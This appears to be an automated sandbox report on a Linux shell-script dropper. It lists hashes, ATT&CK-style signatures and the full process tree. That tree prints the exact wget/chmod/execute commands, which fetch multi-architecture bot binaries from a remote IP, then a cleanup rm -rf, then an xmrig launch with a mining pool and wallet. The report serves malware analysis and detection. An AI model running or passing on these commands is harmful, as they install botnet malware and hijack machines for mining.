Analysis
-
max time kernel
150s -
max time network
95s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
09-11-2024 04:09
Static task
static1
Behavioral task
behavioral1
Sample
tyo2831qq.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
tyo2831qq.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
tyo2831qq.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
tyo2831qq.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
tyo2831qq.sh
-
Size
1KB
-
MD5
e12d6a1166c4e290ed4ba39f96c780ad
-
SHA1
57038253b27c0312102758d25a77b5d1859cba3e
-
SHA256
5f52ba20358d35d9705d4893c2e28bf333f9920d13053b21352be4a1fa6c8199
-
SHA512
276aabcf2037ad435a105ded3f3bfb8491fb391d5e1d49942d41774807c3f0b4e15d1ed18a57f0d783cd9aafee3ce1a96e561d3ee6da02b5d6c51fc579bb91ee
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 731 chmod 743 chmod 748 chmod 752 chmod 760 chmod 764 chmod 713 chmod 724 chmod 738 chmod 756 chmod 770 chmod 776 chmod -
Executes dropped EXE 1 IoCs
Processes:
botsioc pid process /tmp/bots 726 bots -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
Processes:
tyo2831qq.mipsdescription ioc process File opened for reading /proc/net/route tyo2831qq.mips -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
tyo2831qq.mipsdescription ioc process File opened for reading /proc/net/route tyo2831qq.mips -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgettyo2831qq.mipsrmpid process 701 wget 714 tyo2831qq.mips 774 rm -
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetdescription ioc process File opened for modification /tmp/tyo2831qq.x86 wget File opened for modification /tmp/tyo2831qq.i586 wget File opened for modification /tmp/tyo2831qq.m68k wget File opened for modification /tmp/tyo2831qq.mips wget File opened for modification /tmp/bots wget File opened for modification /tmp/tyo2831qq.mpsl wget File opened for modification /tmp/tyo2831qq.sh4 wget File opened for modification /tmp/tyo2831qq.arm6 wget File opened for modification /tmp/tyo2831qq.x32 wget File opened for modification /tmp/tyo2831qq.ppc wget File opened for modification /tmp/tyo2831qq.arm7 wget
Processes
-
/tmp/tyo2831qq.sh/tmp/tyo2831qq.sh1⤵PID:697
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:701 -
/bin/chmodchmod 777 tyo2831qq.mips2⤵
- File and Directory Permissions Modification
PID:713 -
/tmp/tyo2831qq.mips./tyo2831qq.mips2⤵
- Reads system routing table
- Reads system network configuration
- System Network Configuration Discovery
PID:714 -
/usr/bin/wgetwget http://31.172.80.237/bots2⤵
- Writes file to tmp directory
PID:718 -
/bin/chmodchmod 777 bots2⤵
- File and Directory Permissions Modification
PID:724 -
/tmp/bots./bots2⤵
- Executes dropped EXE
PID:726 -
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.mpsl2⤵
- Writes file to tmp directory
PID:728 -
/bin/chmodchmod 777 tyo2831qq.mpsl2⤵
- File and Directory Permissions Modification
PID:731 -
/tmp/tyo2831qq.mpsl./tyo2831qq.mpsl2⤵PID:732
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.sh42⤵
- Writes file to tmp directory
PID:735 -
/bin/chmodchmod 777 tyo2831qq.sh42⤵
- File and Directory Permissions Modification
PID:738 -
/tmp/tyo2831qq.sh4./tyo2831qq.sh42⤵PID:739
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.x862⤵
- Writes file to tmp directory
PID:742 -
/bin/chmodchmod 777 tyo2831qq.x862⤵
- File and Directory Permissions Modification
PID:743 -
/tmp/tyo2831qq.x86./tyo2831qq.x862⤵PID:744
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.arm62⤵
- Writes file to tmp directory
PID:747 -
/bin/chmodchmod 777 tyo2831qq.arm62⤵
- File and Directory Permissions Modification
PID:748 -
/tmp/tyo2831qq.arm6./tyo2831qq.arm62⤵PID:749
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.x322⤵
- Writes file to tmp directory
PID:751 -
/bin/chmodchmod 777 tyo2831qq.x322⤵
- File and Directory Permissions Modification
PID:752 -
/tmp/tyo2831qq.x32./tyo2831qq.x322⤵PID:753
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.ppc2⤵
- Writes file to tmp directory
PID:755 -
/bin/chmodchmod 777 tyo2831qq.ppc2⤵
- File and Directory Permissions Modification
PID:756 -
/tmp/tyo2831qq.ppc./tyo2831qq.ppc2⤵PID:757
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.i5862⤵
- Writes file to tmp directory
PID:759 -
/bin/chmodchmod 777 tyo2831qq.i5862⤵
- File and Directory Permissions Modification
PID:760 -
/tmp/tyo2831qq.i586./tyo2831qq.i5862⤵PID:761
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.m68k2⤵
- Writes file to tmp directory
PID:763 -
/bin/chmodchmod 777 tyo2831qq.m68k2⤵
- File and Directory Permissions Modification
PID:764 -
/tmp/tyo2831qq.m68k./tyo2831qq.m68k2⤵PID:765
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.spc2⤵PID:767
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.arm42⤵PID:768
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.arm72⤵
- Writes file to tmp directory
PID:769 -
/bin/chmodchmod 777 tyo2831qq.arm72⤵
- File and Directory Permissions Modification
PID:770 -
/tmp/tyo2831qq.arm7./tyo2831qq.arm72⤵PID:771
-
/usr/bin/wgetwget http://31.172.80.237/tyo2831qq.arm52⤵PID:773
-
/bin/rmrm -rf tyo2831qq.arm6 tyo2831qq.arm7 tyo2831qq.i586 tyo2831qq.m68k tyo2831qq.mips tyo2831qq.mpsl tyo2831qq.ppc tyo2831qq.sh tyo2831qq.sh4 tyo2831qq.x32 tyo2831qq.x862⤵
- System Network Configuration Discovery
PID:774 -
/usr/bin/wgetwget https://github.com/m3Mastika/Dockerfile/raw/refs/heads/main/xmrig2⤵PID:775
-
/bin/chmodchmod 777 xmrig2⤵
- File and Directory Permissions Modification
PID:776 -
/tmp/xmrig./xmrig --url pool.hashvault.pro:80 --user 48mn9hwNxkfjYAppkEaghU1pRbaThMVmnFHuQT44TTDRLLaUsDNCyWDStDZ5DjUqyLaiaywMirbPp1y1zPiVgCeV35ENMV7 --pass bos -B2⤵PID:777
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16KB
MD52615e32f9e7b42b36ba1f3dd6f8f7e3c
SHA14286d999a1a76da1e68cb227e01de237ef5fcf68
SHA256e9bc9d0324b4943e9a9419c9be202331efe86a055768286b45a6ff80eb172078
SHA512b9e21c618c03d111405f5d0e33d08a9bbe37ec6361773f02fde806a2cd784355cc43c64bce22ceeabc2a2e69f277989a26501085c6df725b8bccd9b52ce4ff78